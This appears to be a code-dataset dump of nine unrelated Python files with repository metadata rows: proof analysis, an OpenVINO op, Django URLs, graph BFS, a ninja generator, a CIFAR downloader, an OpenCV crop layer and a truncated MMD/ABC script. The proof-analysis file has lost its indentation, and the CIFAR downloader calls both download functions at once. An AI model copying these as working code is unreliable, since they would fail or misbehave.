] | 26 | 2016-11-07T22:06:31.000Z | 2022-02-16T00:18:29.000Z | deepmath/deephol/utilities/proof_analysis.py | LaudateCorpus1/deepmath | b5b721f54de1d5d6a02d78f5da5995237f9995f9 | [
"Apache-2.0"
] | 168 | 2016-11-07T21:48:55.000Z | 2022-03-19T02:47:14.000Z | """This file contains utilities for analyzing proofs exported by the prover.
The most important function here is a utility that creates an acyclic subgraph
of the proof graph that explains why a proof is correct.
"""
from __future__ import absolute_import
from __future__ import division
# Import Type Annotations
from __future__ import print_function
import tensorflow as tf
from typing import List, Optional, Tuple, Text
from deepmath.deephol import deephol_pb2
from deepmath.proof_assistant import proof_assistant_pb2
class GoalNotFoundError(Exception):
"""Raised when the goal is not found or not proven."""
def __init__(self, goal: Text):
super(GoalNotFoundError, self).__init__()
self.goal = goal
def _thm_string(thm: proof_assistant_pb2.Theorem) -> Text:
"""Turn theorem into a string for unique representation.
Args:
thm: Theorem to be turned into a string.
Returns:
string: Joined hypotheses and conclusion.
"""
return '|:|'.join([str(hyp) for hyp in thm.hypotheses] +
[str(thm.conclusion)])
class Node(object):
"""Temporary node object for proof analysis."""
def __init__(self, node: deephol_pb2.ProofNode, index: int):
# The corresponding proof node.
self.node = node
# The index of the node in the ProofLog.
self.index = index
# A map from index to TacticApplication of successful tactic applications.
self.proofs = {}
# None or the real explanation for the correctness of the node.
# This proof should not be part of any circular reasoning.
self.true_proof = -1
# Closed: whether this was node was successfully closed in this analysis.
self.closed = False
# List of (ProofNode, int) pairs, corresponding to the tactic application
# this node is supposed to be helpful to prove.
self.parents = []
# Processed: marks the proof to be processed for the final output.
self.processed = False
  # Unfortunately, pytype does not allow using "Node" in tactic applications
  # until the whole class is fully defined.
def update_parents(self, goal_to_node, closed_nodes):
"""Create the parents arrays and mark leaf nodes as closed.
This method must be called exactly once for each node marked as closed in
the proof tree.
Whenever a node is closed it closes additional parent nodes. This
information is propagated to the parent nodes and the tactic application
is marked as true proof of the parent if that closes in this turn.
This method collects all the leaf nodes (those nodes with a tactic
    application without subgoals in the closed_nodes list).
Args:
goal_to_node: Callable[[proof_assistant_pb2.Theorem], Node] that finds a
node based on its goal.
closed_nodes: The list of node that got closed in the order of their
closing, of type List[Node].
"""
for i, proof in enumerate(self.node.proofs):
if proof.result == deephol_pb2.TacticApplication.SUCCESS:
if not proof.subgoals:
assert proof.closed, str(proof)
self.true_proof = i
self.closed = True
closed_nodes.append(self)
self.proofs[i] = []
return
for i, proof in enumerate(self.node.proofs):
if proof.closed:
proof = [goal_to_node(subgoal) for subgoal in proof.subgoals]
self.proofs[i] = proof
for node in proof:
node.parents.append((self, i))
def update_closed(self, closed_nodes):
"""Propagate the true reason and closed flags to the parents of a proof.
Args:
closed_nodes: The list of nodes that has been closed so far of type
List[Node].
"""
assert self.true_proof >= 0
assert self.closed
for parent, proof_id in self.parents:
if parent.closed:
continue
proof = parent.proofs[proof_id]
parent.proofs[proof_id] = [n for n in proof if n.index != self.index]
if not parent.proofs[proof_id]:
parent.true_proof = proof_id
parent.closed = True
closed_nodes.append(parent)
parent.update_closed(closed_nodes)
def find_reasons(
proof_log: deephol_pb2.ProofLog
) -> Optional[Tuple[List[Tuple[int, int, List[int]]], List[int]]]:
"""Find the real reasons why the root node of a proof is is proved.
This function assumes that the root node is closed, otherwise an
error message is displayed and None is returned.
Args:
proof_log: Proof log to be analyzed.
Returns:
A pair of (reasons, sorting), where reasons is a list of (int, list of int),
representing the acyclic hypergraph that explains why the proof node is
closed. Each (i, js) in this list represents a TacticApplication for node
with index i, and js is the list of node indices to which the
TacticApplication refers to. All nodes are represented by their index in
the proof_log.nodes list.
The sorting represents a topological sorting of all the nodes that
contribute to the above proof. This list starts with the theorem nodes and
the subgoals always come after the nodes they prove.
"""
# A map that maps the string representation of proof_assistant_pb2.Theorems to
# their nodes. It stores only those nodes that are marked to be proved.
thm_node = {}
# Node objects corresponding to the root of the proof log. The roots should
# be marked as THEOREM.
to_process = []
def goal_to_node(thm):
thm_str = _thm_string(thm)
node = thm_node.get(thm_str, None)
if node is None:
raise GoalNotFoundError(thm_str)
return node
# Create the mapping that maps theorem representations to Node.
# Also updates the list of nodes for which the proofs should be reconstructed.
for i, node in enumerate(proof_log.nodes):
if node.status == deephol_pb2.ProofNode.PROVED:
ths = _thm_string(node.goal)
if ths in thm_node:
other = thm_node[ths]
other.node.proofs.extend(node.proofs)
continue
n = Node(node, i)
thm_node[ths] = n
if node.goal.tag == proof_assistant_pb2.Theorem.THEOREM:
to_process.append(n)
if not to_process:
# We don't have anything to prove, so we just return an empty reasons and
# an empty nodes list.
return ([], [])
closed = []
# Initialize the parent node information and mark leaf nodes to be proved.
try:
for node in sorted(thm_node.values(), key=lambda n: n.index):
node.update_parents(goal_to_node, closed)
if not closed:
    tf.logging.error('There are no closed leaves (tactic applications '
                     'without subgoals).')
return None
except GoalNotFoundError as xcp:
tf.logging.error(
'Could not find subgoal "%s" of closed proof among closed '
'nodes.', xcp.goal)
return None
i = 0
# We mark the true reason for being closed backwards from the leaf nodes.
while i < len(closed):
closed[i].update_closed(closed)
i += 1
for n in to_process:
if not n.closed:
tf.logging.error('Root %d is marked closed, but it does not check out.',
n.index)
return None
n.processed = True
# Collect the reasons for all the nodes in a BFS manner starting from the
# theorem nodes.
reasons = []
i = 0
while i < len(to_process):
node = to_process[i]
i += 1
if node.true_proof < 0 or not node.closed:
tf.logging.error('Node %d has no true proof, but it is marked proved.', i)
return None
proof = node.node.proofs[node.true_proof]
try:
subgoals = [goal_to_node(subgoal) for subgoal in proof.subgoals]
except GoalNotFoundError as xcp:
tf.logging.error('Could not find subgoal "%s" among proved nodes',
xcp.goal)
return None
reasons.append((node.index, node.true_proof,
[subgoal.index for subgoal in subgoals]))
for subgoal in subgoals:
if not subgoal.processed:
subgoal.processed = True
to_process.append(subgoal)
return reasons, [node.index for node in to_process if node is not None]
def _keep_tac_app(node: deephol_pb2.ProofNode, i: int) -> deephol_pb2.ProofNode:
"""Keep only one tactic application with the given index in the node.
Args:
node: The node for which the tactic_applications list is to be reduced.
i: Index of the tactic application.
Returns:
A new node with a single tactic_application.
"""
tac_app = deephol_pb2.TacticApplication()
tac_app.CopyFrom(node.proofs[i])
del node.proofs[:]
node.proofs.add().CopyFrom(tac_app)
return node
def extract_proof(proof_log: deephol_pb2.ProofLog
) -> Optional[deephol_pb2.ProofLog]:
"""Reduce the proof into a simply checkable format.
The utility of this function is to prune the proof to an acyclic
sub-hypergraph, so that the proof argument is trivial to check.
All the nodes in this acyclic hypergraph are proved and correspond to
the proof of the root node of the proof log. The nodes are ordered
  from the highest level targets; that means each goal precedes its
  subgoals in the list of nodes.
Args:
proof_log: The proof_log that needs to be reduced.
Returns:
    A new ProofLog with a minimal proof necessary to prove all closed
Theorem nodes.
"""
if not proof_log.nodes:
return proof_log
result = find_reasons(proof_log)
if result is None:
return None
(reasons, _) = result
new_log = deephol_pb2.ProofLog(
error_message=proof_log.error_message,
num_proofs=proof_log.num_proofs,
prover_options=proof_log.prover_options,
time_spent=proof_log.time_spent,
theorem_in_database=proof_log.theorem_in_database)
new_log.nodes.extend([
_keep_tac_app(proof_log.nodes[node_index], tac_app_index)
for node_index, tac_app_index, _ in reasons
])
return new_log
| 36.291513 | 80 | 0.696289 | 1,459 | 9,835 | 4.583276 | 0.211789 | 0.022731 | 0.008973 | 0.010767 | 0.092418 | 0.053537 | 0.043368 | 0.043368 | 0.043368 | 0.030806 | 0 | 0.003049 | 0.233045 | 9,835 | 270 | 81 | 36.425926 | 0.883468 | 0.439451 | 0 | 0.136986 | 0 | 0 | 0.0529 | 0 | 0 | 0 | 0 | 0 | 0.020548 | 1 | 0.061644 | false | 0 | 0.047945 | 0 | 0.219178 | 0.006849 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88b5dae837f606fb166948f31a188865997d6fc | 815 | py | Python | tools/mo/openvino/tools/mo/ops/proposal_python_example.py | pazamelin/openvino | b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48 | [
"Apache-2.0"
] | 1 | 2019-09-22T01:05:07.000Z | 2019-09-22T01:05:07.000Z | tools/mo/openvino/tools/mo/ops/proposal_python_example.py | pazamelin/openvino | b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48 | [
"Apache-2.0"
] | 58 | 2020-11-06T12:13:45.000Z | 2022-03-28T13:20:11.000Z | tools/mo/openvino/tools/mo/ops/proposal_python_example.py | pazamelin/openvino | b7e8ef910d7ed8e52326d14dc6fd53b71d16ed48 | [
"Apache-2.0"
] | 2 | 2019-09-20T01:33:37.000Z | 2019-09-20T08:42:11.000Z | # Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from openvino.tools.mo.ops.proposal import ProposalOp
from openvino.tools.mo.front.caffe.extractor import register_caffe_python_extractor
from openvino.tools.mo.graph.graph import Graph
from openvino.tools.mo.ops.op import Op
class ProposalPythonExampleOp(Op):
op = 'Proposal'
def __init__(self, graph: Graph, attrs: dict):
mandatory_props = {
'type': __class__.op,
'op': __class__.op,
'post_nms_topn': 300,
'infer': ProposalOp.proposal_infer
}
super().__init__(graph, mandatory_props, attrs)
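# Register this op as the extractor for the named Caffe Python layer and keep
# the class out of the automatic op registry.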
register_caffe_python_extractor(ProposalPythonExampleOp, 'rpn.proposal_layer.ProposalLayer.example')
Op.excluded_classes.append(ProposalPythonExampleOp)
| 31.346154 | 100 | 0.728834 | 97 | 815 | 5.824742 | 0.515464 | 0.084956 | 0.120354 | 0.134513 | 0.077876 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019288 | 0.173006 | 815 | 25 | 101 | 32.6 | 0.818991 | 0.094479 | 0 | 0 | 0 | 0 | 0.097959 | 0.054422 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.25 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88d0771051f1b7a1e367489b942cfbfcad70bbd | 1,021 | py | Python | jemmys/main/urls.py | IanMinash/jemmys | 00dba405ebc4aec8361cdb10972a615f2f6eb295 | [
"MIT"
] | null | null | null | jemmys/main/urls.py | IanMinash/jemmys | 00dba405ebc4aec8361cdb10972a615f2f6eb295 | [
"MIT"
] | null | null | null | jemmys/main/urls.py | IanMinash/jemmys | 00dba405ebc4aec8361cdb10972a615f2f6eb295 | [
"MIT"
] | null | null | null | from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
from .views import home, contact, ProductDetailView, categories, cart_manager, cart, variants, make_order, view_order, order_search, shipping, set_session
urlpatterns = [
path('', home, name='home'),
path('view/<slug:slug>', ProductDetailView.as_view(), name='view-product'),
path('contact', contact, name='contact'),
path('shipping', shipping, name='shipping'),
path('cats', categories, name='cats'),
path('cart', cart, name='cart'),
path('order/', include([
path('', make_order, name='make-order'),
path('search', order_search, name='search-order'),
path('<order_id>', view_order, name='view-order'),
])),
path('cart-manager', cart_manager, name='cart-manager'),
path('variant-info', variants, name='variant-info'),
path('set-session', set_session, name='set-session'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 46.409091 | 154 | 0.685602 | 129 | 1,021 | 5.310078 | 0.286822 | 0.064234 | 0.040876 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140059 | 1,021 | 21 | 155 | 48.619048 | 0.780182 | 0 | 0 | 0 | 0 | 0 | 0.197845 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88d20e30b514eb8551e2ff365c75bb86b2f4e87 | 1,374 | py | Python | src/data/576.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/576.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/576.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from itertools import accumulate, chain, combinations, groupby, permutations, product
from collections import deque, Counter
from bisect import bisect_left, bisect_right
from math import gcd, sqrt, sin, cos, tan, degrees, radians, ceil, floor
from fractions import Fraction
from decimal import Decimal
import sys
n, q = map(int, input().split())
g = [[] for _ in range(n)]  # adjacency list
# rstrip is sometimes needed
#input = lambda: sys.stdin.readline().rstrip()
# faster input; usually unnecessary, use when the input is long
#from sys import setrecursionlimit
#setrecursionlimit(10**7)
def bfs(u):
queue = deque([u])
    d = [None] * n  # initialize distances from u
    d[u] = 0  # distance to itself is 0
while queue:
v = queue.popleft()
for i in g[v]:
if d[i] is None:
d[i] = d[v] + 1
queue.append(i)
return d
MOD = 10**9 + 7
INF = float('inf')
# float infinity (inf)
def resolve():
#n=int(input())
for _ in range(n - 1):
a, b = [int(x) for x in input().split()]
g[a - 1].append(b - 1)
g[b - 1].append(a - 1)
#C = list(map(int, input().split()))
#C.sort()
#d=bfs(1)
#print(d)
d = bfs(0)
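    # Answer queries by depth parity: equal parity of d[c-1] and d[doo-1] means
    # the meeting point is a vertex ("Town"); differing parity means an edge ("Road").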
for i in range(q):
c, doo = map(int, input().split())
if (d[c - 1] - d[doo - 1]) % 2 == 1:
print("Road")
else:
print("Town")
if __name__ == "__main__":
resolve()
| 22.9 | 85 | 0.567686 | 199 | 1,374 | 3.859296 | 0.467337 | 0.041667 | 0.042969 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0222 | 0.278748 | 1,374 | 59 | 86 | 23.288136 | 0.752775 | 0.200146 | 0 | 0 | 0 | 0 | 0.017528 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.194444 | 0 | 0.277778 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88f5b61276e4ae9d0a3a820fc7e3d37e0dd276b | 2,565 | py | Python | AppEngine/make_ninja.py | nicenboim/oplop | bc73e179ff9b628cdffa44284ca3e2d9820a04bf | [
"Apache-2.0"
] | null | null | null | AppEngine/make_ninja.py | nicenboim/oplop | bc73e179ff9b628cdffa44284ca3e2d9820a04bf | [
"Apache-2.0"
] | null | null | null | AppEngine/make_ninja.py | nicenboim/oplop | bc73e179ff9b628cdffa44284ca3e2d9820a04bf | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2.7
from __future__ import absolute_import, print_function
import os
import re
import yaml
MAKE_NINJA_SCRIPT = __file__
MAKE_MANIFEST_SCRIPT = 'make_manifest.py'
MANIFEST_FILENAME = 'cache.manifest'
NINJA_TEMPLATE = """
rule make_ninja
generator = {make_ninja_script}
command = python2.7 {make_ninja_script}
build build.ninja: make_ninja | {make_ninja_script} app.yaml
rule make_manifest
command = python2.7 make_manifest.py --output $out $in
build {cache_manifest_filename}: make_manifest {served} | {make_manifest_script} app.yaml
default {cache_manifest_filename}
"""
def in_static_dir(filepath, static_dirs):
"""See if filepath is contained within a directory contained in
static_dirs."""
for directory in static_dirs:
if filepath.startswith(directory):
return True
else:
return False
if __name__ == '__main__':
with open('app.yaml') as file:
gae_config = yaml.load(file)
skip_re = re.compile('|'.join('({})'.format(regex)
for regex in gae_config['skip_files']))
static_files = set()
static_dirs = set()
for handler in gae_config['handlers']:
if 'secure' not in handler or handler['secure'] != 'always':
            raise RuntimeError('handler rule for {!r} does not force SSL'.format(
handler['url']))
if 'static_files' in handler:
static_files.add(handler['static_files'])
elif 'static_dir' in handler:
static_dirs.add(handler['static_dir'])
skipped = set()
served = set()
cwd = os.getcwd()
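    # Classify every file in the tree as either skipped or served; anything
    # unaccounted for is treated as a configuration error below.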
for dirpath, dirnames, filenames in os.walk(cwd):
for filename in filenames:
filepath = os.path.join(dirpath, filename)[len(cwd)+len(os.sep):]
if skip_re.match(filepath):
skipped.add(filepath)
elif filepath in static_files or in_static_dir(filepath, static_dirs):
served.add(filepath)
else:
raise RuntimeError('{!r} is not handled'.format(filepath))
print('Skipped:')
for path in sorted(skipped):
print(' ', path)
# Cache manifest cannot depend on itself.
try:
served.remove(MANIFEST_FILENAME)
except KeyError:
pass
with open('build.ninja', 'w') as file:
file.write(NINJA_TEMPLATE.format(make_ninja_script=MAKE_NINJA_SCRIPT,
make_manifest_script=MAKE_MANIFEST_SCRIPT,
cache_manifest_filename=MANIFEST_FILENAME,
served=' '.join(served)))
| 29.482759 | 89 | 0.646394 | 318 | 2,565 | 4.968553 | 0.330189 | 0.04557 | 0.056962 | 0.027848 | 0.074684 | 0.036709 | 0 | 0 | 0 | 0 | 0 | 0.003114 | 0.248733 | 2,565 | 86 | 90 | 29.825581 | 0.816814 | 0.053411 | 0 | 0.032258 | 0 | 0 | 0.237898 | 0.030203 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016129 | false | 0.016129 | 0.064516 | 0 | 0.112903 | 0.048387 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e88fb1838f6ff177723daf69814346373304e3e7 | 813 | py | Python | newtend_service.py | openprocurement/robot_tests.broker.newtend | 5b111585eaa1aecf255478ccb45fa3a631499a4c | [
"Apache-2.0"
] | null | null | null | newtend_service.py | openprocurement/robot_tests.broker.newtend | 5b111585eaa1aecf255478ccb45fa3a631499a4c | [
"Apache-2.0"
] | 13 | 2016-09-13T12:54:35.000Z | 2017-12-10T10:02:09.000Z | newtend_service.py | openprocurement/robot_tests.broker.newtend | 5b111585eaa1aecf255478ccb45fa3a631499a4c | [
"Apache-2.0"
] | 8 | 2016-04-07T13:10:13.000Z | 2019-11-28T16:30:53.000Z | from datetime import datetime
from iso8601 import parse_date
from op_robot_tests.tests_files.service_keywords import get_now
from calendar import monthrange
def newtend_date_picker_index(isodate):
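    # Index of isodate's cell in the site's month-view date picker; mod offsets
    # for the weekday of the first day of the current month.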
now = get_now()
date_str = '01' + str(now.month) + str(now.year)
first_day_of_month = datetime.strptime(date_str, "%d%m%Y")
mod = first_day_of_month.isoweekday() - 2
iso_dt = parse_date(isodate)
# last_day_of_month = monthrange(now.year, now.month)[1]
# LOGGER.log_message(Message("last_day_of_month: {}".format(last_day_of_month), "INFO"))
if now.day > iso_dt.day:
mod = monthrange(now.year, now.month)[1] + mod
return mod + iso_dt.day
def update_data_for_newtend(tender_data):
tender_data.data.procuringEntity['name'] = u"openprocurement"
return tender_data
| 35.347826 | 92 | 0.734317 | 125 | 813 | 4.472 | 0.432 | 0.044723 | 0.089445 | 0.075134 | 0.093023 | 0.093023 | 0 | 0 | 0 | 0 | 0 | 0.0131 | 0.154982 | 813 | 22 | 93 | 36.954545 | 0.800582 | 0.173432 | 0 | 0 | 0 | 0 | 0.040359 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8925628c7941abc45dfbee01462286b7a002051 | 1,096 | py | Python | cifar/download.py | messiest/cifar-image-classifier | a2efe26a69143f21dce78bbc015611a3cf6feb60 | [
"BSD-3-Clause"
] | null | null | null | cifar/download.py | messiest/cifar-image-classifier | a2efe26a69143f21dce78bbc015611a3cf6feb60 | [
"BSD-3-Clause"
] | null | null | null | cifar/download.py | messiest/cifar-image-classifier | a2efe26a69143f21dce78bbc015611a3cf6feb60 | [
"BSD-3-Clause"
] | null | null | null | import os
from torchvision.datasets.cifar import CIFAR10, CIFAR100
IMG_DIR = './data'
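# torchvision downloads and extracts the CIFAR archives into this directory.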
def download10():
"""download cifar100 dataset"""
if not os.path.exists(IMG_DIR):
os.mkdir(IMG_DIR)
    cifar = CIFAR10(root=IMG_DIR, download=True)
    assert(bool(cifar))
    print("download complete")
    return cifar
def download100():
"""download cifar100 dataset"""
if not os.path.exists(IMG_DIR):
os.mkdir(IMG_DIR)
cifar = CIFAR100(root=IMG_DIR, download=True)
return cifar
class Downloader:
def __init__(self, dataset=10, n=1, download=False):
"""these values belong to an instance of the class"""
print("downloading CIFAR-{} data...".format(dataset))
self.name = "CIFAR{}".format(dataset)
        if download:
            # look up and call only the downloader for the selected dataset
            self.download = {
                'CIFAR10': download10,
                'CIFAR100': download100,
            }[self.name]()
def __repr__(self):
"""has to return a string"""
return self.name
def main():
# if dataset == '10'
dl = Downloader(100)
if __name__ == "__main__":
main()
| 22.367347 | 61 | 0.594891 | 128 | 1,096 | 4.914063 | 0.421875 | 0.066773 | 0.073132 | 0.079491 | 0.27345 | 0.203498 | 0.203498 | 0.203498 | 0.203498 | 0.203498 | 0 | 0.048934 | 0.27281 | 1,096 | 48 | 62 | 22.833333 | 0.740276 | 0.129562 | 0 | 0.137931 | 0 | 0 | 0.086817 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 1 | 0.172414 | false | 0 | 0.068966 | 0 | 0.344828 | 0.068966 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8929f4e65fd5b5e13e3dc2fc143aa36dc7768d1 | 894 | py | Python | edge_detection_function/tensorflow_layer.py | chiang9/Edge_detection | bd1797f1be31dbd7cc90ead5ed0972865576a7c8 | [
"MIT"
] | 2 | 2020-08-10T14:00:04.000Z | 2021-01-18T08:44:21.000Z | edge_detection_function/tensorflow_layer.py | chiang9/Edge_detection | bd1797f1be31dbd7cc90ead5ed0972865576a7c8 | [
"MIT"
] | null | null | null | edge_detection_function/tensorflow_layer.py | chiang9/Edge_detection | bd1797f1be31dbd7cc90ead5ed0972865576a7c8 | [
"MIT"
] | null | null | null | class CropLayer(object):
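    # Custom layer for OpenCV's dnn module; presumably registered with
    # cv2.dnn_registerLayer('Crop', CropLayer) as in the HED edge-detection sample.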
def __init__(self, params, blobs):
self.xstart = 0
self.xend = 0
self.ystart = 0
self.yend = 0
# Our layer receives two inputs. We need to crop the first input blob
# to match a shape of the second one (keeping batch size and number of channels)
def getMemoryShapes(self, inputs):
inputShape, targetShape = inputs[0], inputs[1]
batchSize, numChannels = inputShape[0], inputShape[1]
height, width = targetShape[2], targetShape[3]
self.ystart = (inputShape[2] - targetShape[2]) // 2
self.xstart = (inputShape[3] - targetShape[3]) // 2
self.yend = self.ystart + height
self.xend = self.xstart + width
return [[batchSize, numChannels, height, width]]
def forward(self, inputs):
return [inputs[0][:,:,self.ystart:self.yend,self.xstart:self.xend]] | 38.869565 | 84 | 0.629754 | 114 | 894 | 4.903509 | 0.438596 | 0.071556 | 0.039356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025487 | 0.253915 | 894 | 23 | 85 | 38.869565 | 0.812594 | 0.163311 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0 | 0 | 0.058824 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e893a4fe398ce90ad4805fac1e87712018fa446c | 9,409 | py | Python | rejection_sampling.py | psteinb/HINT | 8d5c3421fa898776eaa11a61bf0e3cb8b44de1ab | [
"MIT"
] | null | null | null | rejection_sampling.py | psteinb/HINT | 8d5c3421fa898776eaa11a61bf0e3cb8b44de1ab | [
"MIT"
] | null | null | null | rejection_sampling.py | psteinb/HINT | 8d5c3421fa898776eaa11a61bf0e3cb8b44de1ab | [
"MIT"
] | null | null | null | import numpy as np
import torch
import time
import os
import matplotlib.pyplot as plt
import pickle
from tqdm import tqdm
from scipy.spatial import distance_matrix
from data import FourierCurveModel
# Choose data set
dataset = ('fourier_curve', 'fourier-curve')
# dataset = ('plus_shape', 'plus-shape')
# Choose number of run (3 to 5 training runs were used to calculate error statistics)
run = 0
# Uncomment to import and prepare saved models
conditional_models = {}
# for name in ['conditional_cinn_1', 'conditional_cinn_2', 'conditional_cinn_4', 'conditional_cinn_8', 'conditional_hint_1_full', 'conditional_hint_2_full', 'conditional_hint_4_full', 'conditional_hint_8_full']:
# exec("import configs." + dataset[0] + "." + name + " as " + name)
# exec(name + ".model.load_state_dict(torch.load(f'output/{run}/{" + name + ".c.suffix}.pt')['net'])")
# exec("conditional_models[" + name + ".c.suffix] = {'model': " + name + ".model, 'inverse': " + name + ".model_inverse}")
unconditional_models = {}
# for name in ['unconditional_inn_1', 'unconditional_inn_2', 'unconditional_hint_1_full', 'unconditional_hint_2_full']:
# exec("import configs." + dataset[0] + "." + name + " as " + name)
# exec(name + ".model.load_state_dict(torch.load(f'output/{run}/{" + name + ".c.suffix}.pt')['net'])")
# exec("unconditional_models[" + name + ".c.suffix] = {'model': " + name + ".model, 'inverse': " + name + ".model_inverse}")
def multi_mmd(x, y, widths_exponents=[(0.5, 1), (0.2, 1), (0.2, 0.5)]):
# def multi_mmd(x, y, widths_exponents=[(1, 0.5), (0.2, 0.8), (0.2, 0.4)]):
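    # Multi-kernel MMD estimate: sums inverse-multiquadric kernels
    # k(d) = C**a * ((C + d) / a)**-a over several (C, a) scales, where d is the
    # squared Euclidean distance, and returns mean k(x,x') + k(y,y') - 2 k(x,y).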
xx, yy, xy = torch.mm(x,x.t()), torch.mm(y,y.t()), torch.mm(x,y.t())
rx = xx.diag().unsqueeze(0).expand_as(xx)
ry = yy.diag().unsqueeze(0).expand_as(yy)
dxx = torch.clamp(rx.t() + rx - 2.*xx, 0, np.inf)
dyy = torch.clamp(ry.t() + ry - 2.*yy, 0, np.inf)
dxy = torch.clamp(rx.t() + ry - 2.*xy, 0, np.inf)
XX = torch.zeros(xx.shape).cuda()
YY = torch.zeros(xx.shape).cuda()
XY = torch.zeros(xx.shape).cuda()
for C, a in widths_exponents:
XX += C**a * ((C + dxx) / a)**-a
YY += C**a * ((C + dyy) / a)**-a
XY += C**a * ((C + dxy) / a)**-a
return torch.mean(XX + YY - 2.*XY)
def prepare_samples(model, N=int(1e8)):
print(f'Drawing {N:,} samples from "{model.name}" prior...', end=' ')
t = time.time()
x, y, = [], []
for i in tqdm(range(int(N/1e4))):
x.append(model.sample_prior(int(1e4)).astype(np.float32))
y.append(model.forward_process(x[-1]).astype(np.float32))
np.save(f'abc/{model.name}_x_huge', np.concatenate(x, axis=0))
np.save(f'abc/{model.name}_y_huge', np.concatenate(y, axis=0))
print(f'Done in {time.time()-t:.1f} seconds.')
def quantile_ABC(x, y, y_target, n=4000):
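    # Quantile-based rejection ABC: keep the n prior draws whose simulated
    # observations are closest (Euclidean) to y_target.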
print(f'Evaluating ABC to obtain {n:,} samples closest to {y_target[0]} from set of {len(y):,}...', end=' ')
t = time.time()
d = distance_matrix(y_target, y)[0]
sort = np.argsort(d)[1:]
sample = x[sort][:n]
threshold = d[sort[n]]
print(f'Done in {time.time()-t:.1f} seconds, tolerance is {threshold:.3f}.')
return sample, threshold
def mean_target_distance(model, y_target, x):
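    # Mean Euclidean distance between the observations simulated from x (first
    # two components dropped) and the target observation.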
y = model.forward_process(x.cpu().numpy())[:,2:]
dist = torch.sum((torch.FloatTensor(y) - y_target[0].cpu())**2, dim=1).sqrt()
return dist.mean()
def compare_unconditional(data_model, n_runs=100, sample_size=4000):
# Load data
x = np.load(f'abc/{data_model.name}_x_huge.npy')
# Prepare lists
for model in unconditional_models.values():
model['samples'] = []
model['times'] = []
model['mmds'] = []
# Perform runs
for i in range(n_runs):
print(f'\nRun {i+1:04}/{n_runs:04}:')
# Ground truth sample and shared latent sample for all models
gt_sample = torch.tensor(x[np.random.choice(x.shape[0], sample_size, replace=False)], device='cuda')
z_sample = torch.cuda.FloatTensor(sample_size, data_model.n_parameters).normal_()
# Generate samples from all models
with torch.no_grad():
for name, model in unconditional_models.items():
t = time.time()
sample = model['inverse'](z_sample)
model['times'].append(time.time() - t)
